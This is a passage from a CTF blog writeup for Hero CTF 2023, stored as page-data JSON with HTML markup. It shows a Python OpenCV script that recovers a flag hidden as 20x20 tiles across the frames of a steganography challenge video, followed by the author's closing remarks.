aria-label=\"subliminalstego permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Subliminal(Stego)</h2>\n<blockquote>\n<p>An image has been hidden in this video. 
Don’t fall into madness.</p>\n<p>Little squares size : 20x20 pixels</p>\n<p>Format : Hero{}\nAuthor : Thibz</p>\n</blockquote>\n<p>When I played the provided mp4 file, I noticed that each frame showed a single 20×20-pixel tile, and that the tile advanced by one square per frame, as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 852px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/9d7f85cc58e0827afc205841a89aa532/47ff6/image-20230517233038973.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/9d7f85cc58e0827afc205841a89aa532/8ac56/image-20230517233038973.webp 240w,\n/static/9d7f85cc58e0827afc205841a89aa532/d3be9/image-20230517233038973.webp 480w,\n/static/9d7f85cc58e0827afc205841a89aa532/39392/image-20230517233038973.webp 852w\"\n              sizes=\"(max-width: 852px) 100vw, 852px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/9d7f85cc58e0827afc205841a89aa532/8ff5a/image-20230517233038973.png 240w,\n/static/9d7f85cc58e0827afc205841a89aa532/e85cb/image-20230517233038973.png 480w,\n/static/9d7f85cc58e0827afc205841a89aa532/47ff6/image-20230517233038973.png 852w\"\n            sizes=\"(max-width: 852px) 100vw, 852px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/9d7f85cc58e0827afc205841a89aa532/47ff6/image-20230517233038973.png\"\n            alt=\"image-20230517233038973\"\n            
title=\"image-20230517233038973\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>It looked like I could recover the flag by stitching these 20×20-pixel tiles together into a single image.</p>\n<p>So I wrote the following OpenCV solver, which cuts the tile out of each frame at its raster position and finally merges all of them into one image.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"># pip install opencv-python\nimport cv2\n\n# Open the video file\ncap = cv2.VideoCapture('subliminal_hide.mp4')\nwidth = int(cap.get(cv2.CAP_PROP_FRAME_WIDTH))\nheight = int(cap.get(cv2.CAP_PROP_FRAME_HEIGHT))\nprint(width, height)\n\n# Size of the tile carried by each frame (from the challenge hint)\ncrop_x = 20  # tile width\ncrop_y = 20  # tile height\n\n# Each frame carries one tile at the next raster position (left to right,\n# top to bottom): crop it out, collect a full row, then stack the rows.\n# Keeping the rows in memory avoids the lossy JPEG round trip through disk.\nrows = []   # completed rows, each a horizontal strip of tiles\ntiles = []  # tiles of the row currently being assembled\nx = 0       # current tile x-coordinate\ny = 0       # current tile y-coordinate\nframe_count = 0\nwhile cap.isOpened():\n    ret, frame = cap.read()\n    if not ret:\n        break\n    frame_count += 1\n\n    # Cut the tile at the current raster position out of this frame\n    tiles.append(frame[y:y+crop_y, x:x+crop_x])\n    x += crop_x\n    if x == width:\n        # Row complete: join its tiles and move down to the next row\n        rows.append(cv2.hconcat(tiles))\n        tiles = []\n        x = 0\n        y += crop_y\n        if y == height:\n            break\n\n# Release the video file\ncap.release()\nprint(frame_count, 'frames read,', len(rows), 'rows assembled')\n\n# Stack the rows into the final image and save it\nresult = cv2.vconcat(rows)\ncv2.imwrite(<span class=\"token 
string\">'result.jpg'</span><span class=\"token punctuation\">,</span> result<span class=\"token punctuation\">)</span></code></pre></div>\n<p>This let me extract the flag from the resulting image.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/709f687e0fb871214acb3f4cdbce7b2f/7a18f/image-20230517233320477.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 56.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAALCAYAAAB/Ca1DAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB1ElEQVQoz4VSbVPTQBDO//8LzPhZlGqryOCMOn7AaRtSIqlAq7aFQkWGtgmQl3tJ8ri7SQ34xbt55m73nn1ub/ecVbSGLgwyo6AImdVQVtXQZKvq7JFP/Gazf+p3wvsQFrmImtLC0KpzTTCCnHw8TWHF5tWWOQqUf21T5PVq4aw3giSSmkxEeZQ0ecTqAVEckd+ICF+Y6gz8MmbkNA3FmqKCs74LwffxbR8/f0L7TQc9ty97d+DCHx5he+c5Ortt8fW9Q8RZgrd77/Cl18XN8oaiOXtKplCc4YoErdRhejFFcDLE0bGP0Y8R4Qxn308xnozh+YfwA/L/HCO8j0S477lYhrecI1SRUdlqQdIXg0dwEmB2OcP17QLB6TEGvofF7yvMLiY4J//81xze14FcOF+cU0QBlSuJN40gN0Ah0TE90cfO65d4/2EfL1rbeNVpoet20Wq3xNfzuth6toWD3oFkXUj9K7Gqho8Er64v5QmpTpFQnTKTCjGXthGr1IJExdTABNFDKH75FRvB1d1SNspyDZpuWe4cP4WKrWwKTTXWzKl5DEudlzjiKeYRHP4WqD9KM8p/8L/z5sz5NhpKsWfU4Q2m8wl1fNLYNRpOdV5xnnL/ABnCPaTv38gmAAAAAElFTkSuQmCC'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/709f687e0fb871214acb3f4cdbce7b2f/8ac56/image-20230517233320477.webp 240w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/d3be9/image-20230517233320477.webp 480w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/e46b2/image-20230517233320477.webp 960w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/26255/image-20230517233320477.webp 1284w\"\n              sizes=\"(max-width: 960px) 100vw, 
960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/709f687e0fb871214acb3f4cdbce7b2f/8ff5a/image-20230517233320477.png 240w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/e85cb/image-20230517233320477.png 480w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/d9199/image-20230517233320477.png 960w,\n/static/709f687e0fb871214acb3f4cdbce7b2f/7a18f/image-20230517233320477.png 1284w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/709f687e0fb871214acb3f4cdbce7b2f/d9199/image-20230517233320477.png\"\n            alt=\"image-20230517233320477\"\n            title=\"image-20230517233320477\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"summary\" style=\"position:relative;\"><a href=\"#summary\" aria-label=\"summary permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Summary</h2>\n<p>This time again I mainly worked on Rev and Forensic, and I really enjoyed how distinctive the problems were, using real malware and incidents almost as-is.</p>\n<p>There are still a few challenges I haven’t solved yet, so I want to retry them while reading the 
writeups.</p>","fields":{"slug":"/ctf-heroctf-2023-en","tagSlugs":["/tag/ctf-en/","/tag/rev-en/","/tag/forensic-en/","/tag/osint-en/","/tag/english/"]},"frontmatter":{"date":"2023-05-16","description":"Hero CTF 2023 Writeup","tags":["CTF (en)","Rev (en)","Forensic (en)","OSINT (en)","English"],"title":"Hero CTF 2023 Writeup","socialImage":{"publicURL":"/static/354a25e616ee5512c3e7d6805372d84b/ctf-heroctf-2023.png"}}}},"pageContext":{"slug":"/ctf-heroctf-2023-en"}},"staticQueryHashes":["251939775","401334301","825871152"]}